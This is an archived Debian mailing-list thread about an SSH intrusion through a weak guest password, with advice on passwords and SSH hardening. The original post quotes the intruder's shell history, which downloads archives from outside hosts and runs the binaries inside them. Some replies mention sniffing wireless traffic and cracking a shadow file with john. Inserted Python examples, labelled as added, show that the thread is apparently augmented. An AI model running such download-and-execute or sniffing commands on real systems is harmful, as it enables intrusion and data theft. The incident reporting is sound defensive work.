Re: See what a weak password will get ya?

2004-07-24 Thread John Summerfield
Greg Folkert wrote:
Apparently, the best is to replace crypt based passwords with RSA
based, and use longer passwords.
   

Actually, best actual reasonable password is: to not use one
 

I've noticed that using Debian without a root password requires some work.
I'm comfortable in _my_ circumstances that anyone with physical access 
owns it anyway. Requiring a root password to get to single-user is a 
minor inconvenience with several easy ways round it.

Worse, if a filesystem check fails and drops you to single-user mode and 
you don't have a root passwd then you're stuffed.


--
Cheers
John
-- spambait
[EMAIL PROTECTED]  [EMAIL PROTECTED]
Tourist pics http://portgeographe.environmentaldisasters.cds.merseine.nu/
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Re: See what a weak password will get ya?

2004-07-24 Thread Jon Dowland
On Thu, 22 Jul 2004 17:42:53 -0500, Paul Stolp [EMAIL PROTECTED] wrote:

 ./t
 ./h2
 rm -rf h2
 k;./brk

Has anyone grabbed these and checked to see whats inside them?


-- 
Jon Dowland
[EMAIL PROTECTED]





Re: cracking - Re: See what a weak password will get ya?

2004-07-23 Thread Alvin Oga

On Thu, 22 Jul 2004, s. keeling wrote:

 Incoming from Alvin Oga:
  
  - and hopefully, they don't have the passwd file from /etc/shadow
  to compare against 
 
 Agreed.  Once they're in, all bets are off. 

best to assume they are already in and sniffing .. 24x7 and work knowing
they can pick up info from their hidden special directory
- if you write a single a into  /tmp/a.txt
the other 511 bytes is available for a secret filesystem
( lots of unused disk space available for hiding
( that regular tools will never find these constantly changing
(  hidden files

 Why bother to crack if you can sniff?

but they and anybody can sniff ???  and yes ... 10x easier to sniff
and maybe even get lucky and get the passwd to all their machines
at work too

- sniff your boxes at the colo ...
( lots of wrong masks being set, to be able to sniff other
( machines - sorta illegal to sniff ??
 
- sniff the wireless connection ...
1/2 the wireless network is not encrypted, so hopefully,
they are least using ssh for all data transfers
( good for tricking a few people to hang around longer
( to see what they're sniffing on an unencrypted wep traffic

- kismet + ethereal .. see your neighbor's data

c ya
alvin





Re: See what a weak password will get ya?

2004-07-23 Thread Karsten M. Self
on Thu, Jul 22, 2004 at 07:24:01PM -0700, Scarletdown ([EMAIL PROTECTED]) wrote:
 Paul Stolp wrote:
 I checked in on some bittorrent progress today at lunch, noticed my
 I'm not sure the July 19 log snippet is related, but seems likely.
 Anyways, I've re-downloaded the files the attacker used and removed (for
 posterity.)
 I changed all passwords, IP Address, I found the evidence at about
 12:24.
 Just wanted to share the need for strong passwords.
 
 I second that recommendation.  I always prefer to have passwords with 
 the following features:
 
 Minimum of 8 characters
 At least 1 capital letter
 At least 1 lower case letter
 At least 1 number
 At least 1 special character
 
 An example of a good password (though since I'm posting it here, it can 
 no longer be considered good) is:
 
 [EMAIL PROTECTED]

My own preference is the 'pwgen' and 'gpw' utilities included in Debian,
combined with either the PalmOS Keyring utility or the vim editing
encrypted files transparently hack documented at:

http://twiki.iwethey.org/Main/IwtNix


Sample pwgen output:

Eive3viequ oos5eigooV aeR0ahwein ooNigh1oos Jui6hailel oMaex1ohve
xah8shoJai Ahnaotach9 Paiphie9ph pah8ahcaeG Uapahph6ik taiYolu4os
aiHahp7jae usheXeec7a Ucei9joong Eteefa6aeg Eethohqu2i neiBaeg4ai
Eiri7eagee Pahceibie8 Yeg0iediev eigiji6Gie Ouduo7pahs ya1weuNapo

And for gpw:

ulingain atailsel stedamen misavisi gasseder uarscroc rismener
rectivac icadoura ishoonce

What may not be immediately apparent is that the generated passwords are
pronounceable in a rough sort of a way.  The generation algorithms are
tunable to greater randomness or mnemonic qualities.  It's possible to
test quality by generating a known number of passwords, sorting and
generating a uniq list, and counting the resulting lines.  My findings
are that even the relatively mnemonic lists are of very high quality.
Best tests are on 1m or more passwords, but for a relatively short run of
100,000:

$ time gpw 10 10 | sort | uniq | wc -l
99952

real    0m9.968s
user    0m9.730s
sys     0m0.050s

$ time pwgen 10 10 | sort | uniq | wc -l
99960

real    1m1.252s
user    0m13.550s
sys     0m45.360s


That's 99.952% and 99.960% uniq, respectively, default settings,
ten-character keys.

The observant reader will note that the length and count arguments are
reversed for these utilities.  Remember this as you use them.


For an adult user population, I find that these keys are usually pretty
acceptable.

Working with children, I'm using longer keys by combining a set of
things.  Favorites is a good one, and typical keys run 10-15 characters.
Cryptanalysts will tell you that sticking to dictionary words reduces
the search space markedly, but in balance, it's a good compromise.  With
a user-base extending into the hundreds, only a handful of the youngest
routinely have problems logging in, and I know the keys are not likely
used elsewhere.

Druthers?  I'd echo Greg Folkert's recommendations for key-based
authentication, and use a fob-based password generator plus a PIN.
Something randomly generated, something you have, something you know.
Playing percentages, that's a pretty decent system.

Biometrics?  The shortage of replacement keys, and perverse incentives
to key acquisition (and resultant discomfort) makes me *exceptionally*
wary.  Color me dubious (and leave me my digits and irises).



Peace.

-- 
Karsten M. Self [EMAIL PROTECTED]http://linuxmafia.com/~karsten
Ceterum censeo, Caldera delenda est.


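An added example (not from Karsten's post) that turns the `sort | uniq | wc -l` counts above into an estimate of the generator's effective output space via the birthday bound, and checks the estimator against a constructed generator whose size is known. The 100,000 / 99,952 / 99,960 figures are the ones quoted in the post; the uniform 62-character generator is a stand-in, not gpw or pwgen.

```python
import math
import random
import string


def count_unique(passwords):
    """The thread's 'sort | uniq | wc -l', without the shell."""
    return len(set(passwords))


def estimated_bits(generated, unique):
    """Turn a (generated, unique) count into an estimate of the generator's
    collision entropy in bits.

    Drawing n values uniformly from a space of size K produces about
    n*(n-1)/(2K) colliding pairs (birthday approximation), so from the
    observed duplicate count d we estimate K = n*(n-1)/(2d).  For a
    non-uniform generator this estimates 2**H2 (collision entropy), which
    is never above the Shannon entropy.  Returns None if no duplicate was
    seen: then the run only says K is probably larger than n*(n-1)/2.
    """
    duplicates = generated - unique
    if duplicates <= 0:
        return None
    return math.log2(generated * (generated - 1) / (2 * duplicates))


def expected_duplicates(generated, bits):
    """Duplicates a run of `generated` draws should show if the outputs
    were uniform over 2**bits values (e.g. 10 chars of [A-Za-z0-9] is
    about 59.5 bits and should show none in 100,000 draws)."""
    return generated * (generated - 1) / (2 * 2 ** bits)


def random_passwords(n, length, alphabet, rng):
    """Constructed stand-in generator: uniform over len(alphabet)**length."""
    return ["".join(rng.choice(alphabet) for _ in range(length))
            for _ in range(n)]


def self_check(n=10_000, length=3, seed=1):
    """Run the estimator on a generator whose true size we know; returns
    (true bits, estimated bits), which should agree to a fraction of a bit."""
    alphabet = string.ascii_letters + string.digits      # 62 symbols
    true_bits = length * math.log2(len(alphabet))        # about 17.86 bits
    pw = random_passwords(n, length, alphabet, random.Random(seed))
    return true_bits, estimated_bits(n, count_unique(pw))


if __name__ == "__main__":
    for name, unique in (("gpw", 99952), ("pwgen", 99960)):
        print(name, round(estimated_bits(100_000, unique), 1), "bits (collision entropy estimate)")
    print("self-check (true, estimated):", self_check())
```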



Re: See what a weak password will get ya?

2004-07-23 Thread Joost De Cock
Quoting s. keeling [EMAIL PROTECTED]:

 Incoming from Scarletdown:
 
  An example of a good password (though since I'm posting it here, it can
  no longer be considered good) is:
 
  [EMAIL PROTECTED]

 I disagree.  A cracking program is going to attempt to match
 permutations of dictionary words.  This will not add much more time to
 reach the solution.  Better is concatenation of two strings that won't
 match a dictionary pattern:

 b1rDW0rm

What also makes pretty good passwords is shifting your hands around on the
keyboard. Take a simple to remember password (long enough) and then when typing
on the keyboard, don't press the key you need but the one below it to the right
(for example).

slartibartfast becomes:
x.zfgl zfgvzxg

Letters to the right of the keyboard are best since they yield plenty of '\]\'///
stuff :)
Also using shift every other letter or such is good.

Be creative and combine different techniques instead of depending on one. A
friend of mine once was complaining that he couldn't think of a decent password,
so I made him this one:

[EMAIL PROTECTED]

Straight for the ass! (he's a dirty mind)

Passwords are fun ;)

joost





Re: See what a weak password will get ya?

2004-07-23 Thread Karsten M. Self
on Thu, Jul 22, 2004 at 11:02:11PM -0700, Karsten M. Self ([EMAIL PROTECTED]) wrote:
 on Thu, Jul 22, 2004 at 07:24:01PM -0700, Scarletdown ([EMAIL PROTECTED]) wrote:
  Paul Stolp wrote:

  I second that recommendation.  I always prefer to have passwords with 
  the following features:
  
  Minimum of 8 characters

 My own preference is the 'pwgen' and 'gpw' utilities included in Debian,
 combined with either the PalmOS Keyring utility or the vim editing
 encrypted files transparently hack documented at:

...incidentally, this reminded me that I had to do some locking down of
systems here.  I'd managed to goof a Samba config so that the, um,
trivial Linux system password I'd entered at account creation time
wasn't replaced by the Samba password.

I *knew* I had a number of accounts (several score) to fix.  But didn't
know quite which.

Installed 'john' and copied the shadow file to another system.  Found
the accounts in less than five minutes.

'chpasswd' is another slick utility.  Feed it a list of accounts and
passwords (hashed or plaintext) in the form:

user:password

...and it will update in bulk.

To create that file, I simply ran straight from the 'john' output:

for u in $( awk '{ gsub(/[()]/, "", $2); print $2 }' john.out )   # john prints "password (user)"; keep the user
do
    echo "$u:$( pwgen 20 1 )"   # one fresh 20-character key per account
done | chpasswd

...which generates a set of 20 character random keys even I don't know.

When the users want access to that system, I'll reset their passwords...
...unless they done been misbehavin', in which case I'll have 'em guess
for a while first ;-)


Peace.

-- 
Karsten M. Self [EMAIL PROTECTED]http://linuxmafia.com/~karsten
Ceterum censeo, Caldera delenda est.





Re: See what a weak password will get ya?

2004-07-23 Thread Justinas
On Fri, 23 Jul 2004 00:04:53 -0400
charlie derr [EMAIL PROTECTED] wrote:

 Paul Stolp wrote:
  * dircha [EMAIL PROTECTED] [2004-07-22 21:48]:
  
 Scarletdown wrote:
 
 |  == K
 
  == X
 
 | == P
 
 Anyone else care to add to this little list?
 
 0 == O
 $ == S
 |-| == H
 |_| == U
 |_ == L
 \/\/ == W
 /\/\ == M
 |V| == M
 |\| == N
 |-o-| == tie fighter
 {-o-} == tie interceptor
  
  
  Good plan, I need to improve my ascii art collection.
 
 ^ = V or n //well, sort of :-0
 ! = i
 4 = A
  = G
 3 = E
 5 = S
 + = T
 
 
 i suppose now i ought to look at the rest of the thread too (i didn't 
 notice where it started)
 
   ~c
 
 
 

 d|-_-|b  - stands for DJ

it looks like here we began an IRC chat;] 





Re: See what a weak password will get ya?

2004-07-23 Thread Frank Gevaerts
On Thu, Jul 22, 2004 at 07:24:01PM -0700, Scarletdown wrote:
 I second that recommendation.  I always prefer to have passwords with 
 the following features:
 
 Minimum of 8 characters
 At least 1 capital letter
 At least 1 lower case letter
 At least 1 number
 At least 1 special character

Except that in an ideal world where everyone uses random passwords, this
kind of restriction actually makes the password easier to guess.

Frank

-- 
Debugging is twice as hard as writing the code in the first place.
Therefore, if you write the code as cleverly as possible, you are,
by definition, not smart enough to debug it. - Brian W. Kernighan





Re: See what a weak password will get ya?

2004-07-23 Thread Tim Connors
Frank Gevaerts [EMAIL PROTECTED] said on Fri, 23 Jul 2004 10:44:34 +0200:
 On Thu, Jul 22, 2004 at 07:24:01PM -0700, Scarletdown wrote:
  I second that recommendation.  I always prefer to have passwords with 
  the following features:
  
  Minimum of 8 characters
  At least 1 capital letter
  At least 1 lower case letter
  At least 1 number
  At least 1 special character
 
 Except that in an ideal world where everyone uses random passwords, this
 kind of restriction actually makes the password easier to guess.

That's precisely what I was thinking.

For each character range of size N that you *must* choose, you
diminish the keyspace by a factor of N/256.

So, if you must have a capital letter, there goes a factor of 26/256 ~
1/10.

If you must have a capital letter or a number, then that's now 36/256.

If you must have an underscore, then you lose a factor of 256. Whoa!

Of course, the 256 in all of the above should really be quite a lot
less (maybe 26+10+10 or so special chars?) because most people don't
enter high ascii and control characters into their passwords - maybe
they should :)

-- 
TimC -- http://astronomy.swin.edu.au/staff/tconnors/
Chairman: I'm glad to see so many bright-eyed and bushy-tailed people
here at this time of the morning.  
From the audience: Actually, most of us are rabid. -- From an astro talk


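An added worked computation (not from Tim's post) of how much of the keyspace a composition rule removes: it counts by inclusion-exclusion the strings that contain at least one character from every required class, which the post approximates with the N/256 factor, and applies it to the rule set quoted above. The class sizes (26/26/10/32 over printable ASCII without space, 94 symbols) are an assumption.

```python
from itertools import combinations, product
from math import log2

# The rule set quoted in the thread, as class sizes.  Assumed alphabet:
# printable ASCII without space, 94 symbols = 26 upper + 26 lower
# + 10 digits + 32 other characters.
SCARLETDOWN_RULES = {"upper": 26, "lower": 26, "digit": 10, "special": 32}


def count_meeting_rules(length, class_sizes):
    """Strings of `length` over the union of the classes that contain at
    least one character of EVERY class, by inclusion-exclusion: start from
    all strings, subtract those missing one class, add back those missing
    two (they were subtracted twice), and so on."""
    sizes = list(class_sizes.values())
    alphabet = sum(sizes)
    total = 0
    for k in range(len(sizes) + 1):
        # combinations works by position, so two classes of equal size are fine
        for missing in combinations(sizes, k):
            total += (-1) ** k * (alphabet - sum(missing)) ** length
    return total


def keyspace_fraction(length, class_sizes):
    """Share of all strings over the alphabet that the rules still allow."""
    return count_meeting_rules(length, class_sizes) / sum(class_sizes.values()) ** length


def bits_lost(length, class_sizes):
    """Entropy an attacker no longer has to search because of the rules."""
    return -log2(keyspace_fraction(length, class_sizes))


def brute_force_count(length, classes):
    """Same count by enumeration, for tiny alphabets only; `classes` maps a
    class name to its characters.  Used to validate the formula."""
    alphabet = "".join(classes.values())
    return sum(
        1
        for s in product(alphabet, repeat=length)
        if all(any(c in chars for c in s) for chars in classes.values())
    )


if __name__ == "__main__":
    for length in (8, 10, 12):
        print(length, "chars: fraction kept",
              round(keyspace_fraction(length, SCARLETDOWN_RULES), 3),
              "bits lost", round(bits_lost(length, SCARLETDOWN_RULES), 2))
    # one mandatory symbol that may sit anywhere in an 8-character password
    print("one required '_':", round(bits_lost(8, {"_": 1, "other": 93}), 2), "bits lost")
```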



Re: See what a weak password will get ya?

2004-07-23 Thread Paul Stolp
* Monique Y. Mudama [EMAIL PROTECTED] [2004-07-23 00:04]:

 I'd add the suggestion to not use obvious usernames like guest ... 

agree -- I will prob. replace this account name

 
 Btw, are you 100% sure they never managed to root you and replace some
 of your files?

I wasn't 100% sure I wasn't cracked when I installed, but I am sure that
my core utilities are the same as before this attempt. This and clean
chkrootkit are enough for me, as long as I continue to watch what's
going on.

Thanks everyone, mostly I was just venting, but hopefully this will help
prompt anyone who knows of a potential system weakness.

Paul
-- 





Re: See what a weak password will get ya?

2004-07-23 Thread Awais Ahmad
Hi,

I haven't caught the start of this thread, but how can you be sure your
core utilities have not been altered?

Do you have a record of how they looked before the crack (a backup, MD5 sums
etc., AIDE/Tripwire database)? IMO, you would really need to examine
those binaries on another box against a known equivalent clean copy or
backup/AIDE/Tripwire database before really being sure.


Awais


On Fri, 2004-07-23 at 12:23, Paul Stolp wrote:
 * Monique Y. Mudama [EMAIL PROTECTED] [2004-07-23 00:04]:
 
  I'd add the suggestion to not use obvious usernames like guest ... 
 
 agree -- I will prob. replace this account name
 
  
  Btw, are you 100% sure they never managed to root you and replace some
  of your files?
 
 I wasn't 100% sure I wasn't cracked when I installed, but I am sure that
 my core utilities are the same as before this attempt. This and clean
 chkrootkit are enough for me, as long as I continue to watch what's
 going on.
 
 Thanks everyone, mostly I was just venting, but hopefully this will help
 prompt anyone who knows of a potential system weakness.
 
 Paul
 -- 
 





Re: See what a weak password will get ya?

2004-07-23 Thread Kirk Strauser
On Thursday 22 July 2004 17:42, Paul Stolp wrote:

 See what a weak password will get ya?

No.  I do, however, see what allowing password logins to an SSH server will 
get you.  I could set my password to foo and you still aren't getting in 
without my RSA key (or Kerberos ticket).

Oh, and disable root logins while you're at it if you haven't already.
-- 
Kirk Strauser


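A small audit of the two settings Kirk names, as an added example that is not from his post: it parses sshd_config with sshd's first-occurrence-wins rule and reports password logins or direct root logins left enabled. The two config fragments are constructed, and the defaults assumed for absent keywords are marked in the code.

```python
import re

# Constructed sshd_config fragments: the first leaves password logins at
# their default and permits root; the second is the shape Kirk describes.
WEAK_CONFIG = """\
Port 22
Protocol 2
# PasswordAuthentication not set, so sshd's default (yes) applies
PermitRootLogin yes
PubkeyAuthentication yes
"""

HARDENED_CONFIG = """\
Port 22
Protocol 2
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
PermitRootLogin no
"""

# Assumed values for keywords that are absent (OpenSSH defaults of the
# thread's era; newer releases changed PermitRootLogin's default).
ASSUMED_DEFAULTS = {
    "pubkeyauthentication": "yes",
    "passwordauthentication": "yes",
    "challengeresponseauthentication": "yes",
    "permitrootlogin": "yes",
}

# (keyword, value we want, why it matters)
RULES = [
    ("passwordauthentication", "no",
     "password guessing over SSH stays possible"),
    ("challengeresponseauthentication", "no",
     "PAM can still ask for a password via keyboard-interactive"),
    ("permitrootlogin", "no",
     "root is reachable directly instead of through an unprivileged account"),
    ("pubkeyauthentication", "yes",
     "keys are the only login method left once passwords are off"),
]

# "Keyword value" or "Keyword=value"; X11Forwarding-style names contain digits
KEYWORD_LINE = re.compile(r"([A-Za-z0-9]+)\s*=?\s*(.+)$")


def parse_sshd_config(text):
    """Map lowercased keyword -> value for the global section.

    sshd_config(5): for each keyword the FIRST obtained value is used, so a
    later repeat does not override an earlier one.  Everything after a
    Match line is conditional and is ignored here.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        m = KEYWORD_LINE.match(line)
        if not m:
            continue
        keyword, value = m.group(1).lower(), m.group(2).strip()
        if keyword == "match":
            break
        settings.setdefault(keyword, value)      # first occurrence wins
    return settings


def audit(text):
    """Return a list of findings; an empty list means the config passes."""
    effective = dict(ASSUMED_DEFAULTS)
    parsed = parse_sshd_config(text)
    # newer OpenSSH spells ChallengeResponseAuthentication KbdInteractiveAuthentication
    if "kbdinteractiveauthentication" in parsed:
        parsed.setdefault("challengeresponseauthentication",
                          parsed["kbdinteractiveauthentication"])
    effective.update(parsed)
    findings = []
    for keyword, wanted, why in RULES:
        actual = effective[keyword].lower()
        if actual != wanted:
            findings.append(f"{keyword} is '{actual}', want '{wanted}': {why}")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or ["ok"])
```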


See what a weak password will get ya?

2004-07-22 Thread Paul Stolp
I checked in on some bittorrent progress today at lunch, noticed my
process monitor showing full activity. Ran top, saw user guest logged
on, running 4 instances of a program named t, and short term load
average over 4. AAGGGHHH!
shutdown -h now  !
pull network cable
reboot
look for damage, whew, I was O.K. -- I'm sure it helps to be up to date
on security and running 2.6.7.
changed all passwords to much stronger
Anyhow, I figure turnabout is fair play, so, here's the bash history
from the guest user account, along with the IP addresses the attacker
logged in from:

w
uname -a
wc -l /etc/passwd
wget smenlove.home.ro/t.gz ;tar xzvf t.gz ;  rm -rf t.gz ; ./t
./t
./t
./t
./t
./t
ls
rm -rf t
kill -9 
%1
kill -9 %1
wget smenlove.home.ro/h.tgz ; tar xzvf h.tgz ; rm -rf h.tgz ; ./h2
w
id
./h2 
rm -rf h2 
wget
vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2
-d brk.bz2;chmod +x br
k;./brk
wget
vagabonzi.topcities.com/muzica/muzica/classical/oldclassical/german/old/brk.bz2;bzip2
-d brk.bz2;chmod +x br
k;./brk
ls
passwd
exit


Jul 19 19:54:41 greta sshd[7071]: Illegal user admin from 131.234.157.10
Jul 19 19:54:41 greta sshd[7071]: error: Could not get shadow
information for NO
USER
Jul 19 19:54:41 greta sshd[7071]: Failed password for illegal user admin
from 13
1.234.157.10 port 35860 ssh2
Jul 19 19:54:44 greta sshd[7073]: Illegal user admin from 131.234.157.10
Jul 19 19:54:44 greta sshd[7073]: error: Could not get shadow
information for NO
USER
Jul 19 19:54:44 greta sshd[7073]: Failed password for illegal user admin
from 13
1.234.157.10 port 35917 ssh2
Jul 19 19:54:46 greta sshd[7075]: Illegal user user from 131.234.157.10

Jul 22 10:24:38 greta sshd[22403]: Failed password for illegal user test
from 15
6.17.99.11 port 37183 ssh2
Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from
156.17.99.11
 port 37228 ssh2
 Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user
 guest by (
 uid=0)
 Jul 22 10:24:47 greta sshd[22407]: (pam_unix) session closed for user
 guest

Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from
80.110.102.105 port 3938 ssh2
Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user
guest by (uid=0)
Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure;
logname=guest uid=1002 euid=0 tty= ruser=
 rhost=  user=guest
 Jul 22 12:13:16 greta sshd[22597]: (pam_unix) session closed for user
 guest

I'm not sure the July 19 log snippet is related, but seems likely.
Anyways, I've re-downloaded the files the attacker used and removed (for
posterity.)
I changed all passwords, IP Address, I found the evidence at about
12:24.
Just wanted to share the need for strong passwords.
-- 


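A detection pass over sshd log lines like the excerpt above, as an added example that is not from Paul's post: it counts failed and illegal-user attempts per source address and flags an `Accepted password` that follows them, or that lands on an account such as `guest`. The sample lines are constructed in the same format as the post's and use RFC 5737 documentation addresses; the watched-account list is an assumption.

```python
import re
from collections import defaultdict

# Constructed sample lines in the same format as the sshd excerpt in the post
# (hostname and PIDs echo the post; the source addresses are RFC 5737
# documentation addresses, not the ones that appear in the thread).
SAMPLE_LOG = """\
Jul 19 19:54:41 greta sshd[7071]: Illegal user admin from 192.0.2.10
Jul 19 19:54:41 greta sshd[7071]: Failed password for illegal user admin from 192.0.2.10 port 35860 ssh2
Jul 19 19:54:44 greta sshd[7073]: Illegal user admin from 192.0.2.10
Jul 19 19:54:44 greta sshd[7073]: Failed password for illegal user admin from 192.0.2.10 port 35917 ssh2
Jul 19 19:54:46 greta sshd[7075]: Illegal user user from 192.0.2.10
Jul 22 10:24:38 greta sshd[22403]: Failed password for illegal user test from 198.51.100.11 port 37183 ssh2
Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from 198.51.100.11 port 37228 ssh2
Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from 203.0.113.105 port 3938 ssh2
Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user guest by (uid=0)
"""

ILLEGAL = re.compile(r"Illegal user (\S+) from (\S+)")
FAILED = re.compile(r"Failed password for (?:illegal user )?(\S+) from (\S+) port")
ACCEPTED = re.compile(r"Accepted (\w+) for (\S+) from (\S+) port")

# Assumed list of accounts whose names invite guessing (the thread's 'guest' is one).
WATCHED_ACCOUNTS = frozenset({"guest", "test", "admin"})


def analyse(log_text, watched=WATCHED_ACCOUNTS):
    """Walk sshd lines in order; flag password logins that follow guessing."""
    failures = defaultdict(int)     # source address -> failed password count
    names_tried = defaultdict(set)  # source address -> usernames seen failing
    alerts = []
    for line in log_text.splitlines():
        m = ILLEGAL.search(line)
        if m:  # unknown username: record the name; the Failed line counts it
            user, src = m.groups()
            names_tried[src].add(user)
            continue
        m = FAILED.search(line)
        if m:
            user, src = m.groups()
            failures[src] += 1
            names_tried[src].add(user)
            continue
        m = ACCEPTED.search(line)
        if not m:
            continue
        method, user, src = m.groups()
        reasons = []
        if method == "password" and failures[src] > 0:
            reasons.append(f"password login after {failures[src]} failure(s)")
        if method == "password" and user in watched:
            reasons.append(f"password login to watched account '{user}'")
        if reasons:
            alerts.append({"source": src, "user": user,
                           "prior_failures": failures[src],
                           "names_tried": sorted(names_tried[src]),
                           "reasons": reasons})
    return {"failures": dict(failures), "alerts": alerts}


if __name__ == "__main__":
    for a in analyse(SAMPLE_LOG)["alerts"]:
        print(a["source"], a["user"], "; ".join(a["reasons"]))
```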



Re: See what a weak password will get ya?

2004-07-22 Thread Scarletdown
Paul Stolp wrote:
I checked in on some bittorrent progress today at lunch, noticed my
I'm not sure the July 19 log snippet is related, but seems likely.
Anyways, I've re-downloaded the files the attacker used and removed (for
posterity.)
I changed all passwords, IP Address, I found the evidence at about
12:24.
Just wanted to share the need for strong passwords.
I second that recommendation.  I always prefer to have passwords with 
the following features:

Minimum of 8 characters
At least 1 capital letter
At least 1 lower case letter
At least 1 number
At least 1 special character
An example of a good password (though since I'm posting it here, it can 
no longer be considered good) is:

[EMAIL PROTECTED]
Meets all the above specifications, plus is readable.  Combining special 
characters to make letters also helps.  Though at the moment, I can only 
think of 3 combinations...

|  == K
 == X
| == P
Anyone else care to add to this little list?



Re: See what a weak password will get ya?

2004-07-22 Thread dircha
Scarletdown wrote:
|  == K
  == X
| == P
Anyone else care to add to this little list?
0 == O
$ == S
|-| == H
|_| == U
|_ == L
\/\/ == W
/\/\ == M
|V| == M
|\| == N
|-o-| == tie fighter
{-o-} == tie interceptor
8~~
?
8-)
...
!
--dircha



OT: Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Paul Stolp:
 I checked in on some bittorrent progress today at lunch, noticed my
 process monitor showing full activity. Ran top, saw user guest logged
 on, running 4 instances of a program named t, and short term load
 average over 4. AAGGGHHH!
 shutdown -h now  !
 pull network cable
 reboot
 look for damage, whew, I was O.K. -- I'm sure it helps to be up to date
...

How did you manage to verify that?  Are you running chkrootkit?
tripwire?  Something else?

(0) keeling /home/keeling_ host smenlove.home.ro
smenlove.home.roA   81.196.20.133

(0) keeling /home/keeling_ ripe 81.196.20.133
inetnum:  81.196.20.128 - 81.196.20.159
netname:  RO-RDS-HOME-RO
descr:Home.RO / Go.RO
country:  RO
admin-c:  HAD6-RIPE
tech-c:   HAD6-RIPE
status:   ASSIGNED PA
remarks:  INFRA-AW
remarks:  +---+
remarks:  | ABUSE CONTACT: [EMAIL PROTECTED] IN CASE OF HACK ATTACKS, |
remarks:  | ILLEGAL ACTIVITY, VIOLATION, SCANS, PROBES, SPAM, ETC.|
remarks:  +---+
...

(0) keeling /home/keeling_ ripe 131.234.157.10
inetnum:  131.234.0.0 - 131.234.255.255
netname:  UNIPADERBORN
descr:Universitaet Paderborn
country:  DE
...

(0) keeling /home/keeling_ host 80.110.102.105
Name: chello080110102105.508.15.vie.surfer.at
Address: 80.110.102.105

(0) keeling /home/keeling_ ripe 80.110.102.105
inetnum:  80.110.48.0 - 80.110.118.255
netname:  VIE-15-CUSTOMER-LANCITY
descr:chello Austria
descr:Lancity Customers in Vienna, Headend 15
country:  AT
admin-c:  HMCB1-RIPE
tech-c:   HMCB1-RIPE
status:   ASSIGNED PA
remarks:  Contact [EMAIL PROTECTED] concerning criminal
remarks:  activities like spam, hacks, portscans

 Jul 22 10:24:39 greta sshd[22405]: Accepted password for guest from
 156.17.99.11
  port 37228 ssh2
  Jul 22 10:24:39 greta sshd[22407]: (pam_unix) session opened for user
  guest by (
  uid=0)
...^

 Jul 22 12:09:33 greta sshd[22595]: Accepted password for guest from
 80.110.102.105 port 3938 ssh2
 Jul 22 12:09:33 greta sshd[22597]: (pam_unix) session opened for user
 guest by (uid=0)
 Jul 22 12:12:45 greta passwd[22663]: (pam_unix) authentication failure;
 logname=guest uid=1002 euid=0 tty= ruser=
.^^


 Just wanted to share the need for strong passwords.

Not to mention backups and fresh installation media?


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -





Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Scarletdown:
 
 An example of a good password (though since I'm posting it here, it can 
 no longer be considered good) is:
 
 [EMAIL PROTECTED]

I disagree.  A cracking program is going to attempt to match
permutations of dictionary words.  This will not add much more time to
reach the solution.  Better is concatenation of two strings that won't
match a dictionary pattern:

b1rDW0rm

 |  == K
  == X
 | == P
 
 Anyone else care to add to this little list?

Hadn't thought of those.  Cute.

Apparently, the best is to replace crypt based passwords with RSA
based, and use longer passwords.


-- 
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -





Re: See what a weak password will get ya?

2004-07-22 Thread Chris Metzler
On Thu, 22 Jul 2004 17:42:53 -0500
Paul Stolp [EMAIL PROTECTED] wrote:

 I checked in on some bittorrent progress today at lunch, noticed my
 process monitor showing full activity. Ran top, saw user guest logged
 on, running 4 instances of a program named t, and short term load
 average over 4. AAGGGHHH!
 shutdown -h now  !

Believe it or not, this is often a bad idea.  It's often easier to
determine the scope of a compromise by watching the intruder for a little
while than to attempt to find out afterwards with forensics.


 pull network cable
 reboot
 look for damage, whew, I was O.K.

How did you determine this?

-c

-- 
Chris Metzler   [EMAIL PROTECTED]
(remove snip-me. to email)

As a child I understood how to give; I have forgotten this grace since I
have become civilized. - Chief Luther Standing Bear




Re: See what a weak password will get ya?

2004-07-22 Thread Mathieu Ducharme

On July 22, 2004 10:59 pm, s. keeling wrote:
 Incoming from Scarletdown:
  An example of a good password (though since I'm posting it here, it can
  no longer be considered good) is:
 
  [EMAIL PROTECTED]

 I disagree.  A cracking program is going to attempt to match
 permutations of dictionary words.  This will not add much more time to
 reach the solution.  Better is concatenation of two strings that won't
 match a dictionary pattern:

 b1rDW0rm


I'm pretty sure dictionary attack also look for this. (?)

Use other characters that will make the word absolutely not dictionary related

x[([EMAIL PROTECTED])~(w0rD)]x

Still as easy to remember (longer to type though)

  |  == K
  |
   == X
  
  | == P
 
  Anyone else care to add to this little list?

 Hadn't thought of those.  Cute.

 Apparently, the best is to replace crypt based passwords with RSA
 based, and use longer passwords.


 --
 Any technology distinguishable from magic is insufficiently advanced.
 (*)   http://www.spots.ab.ca/~keeling
 - -

- -- 
Mathieu Ducharme
[EMAIL PROTECTED]
Use GPG to avoid spam trap



Re: See what a weak password will get ya?

2004-07-22 Thread s. keeling
Incoming from Mathieu Ducharme:
 On July 22, 2004 10:59 pm, s. keeling wrote:
  Incoming from Scarletdown:
   An example of a good password (though since I'm posting it here, it can
   no longer be considered good) is:
  
   [EMAIL PROTECTED]
 
  I disagree.  A cracking program is going to attempt to match
  permutations of dictionary words.  This will not add much more time to
 
  b1rDW0rm
 
 I'm pretty sure dictionary attack also look for this. (?)

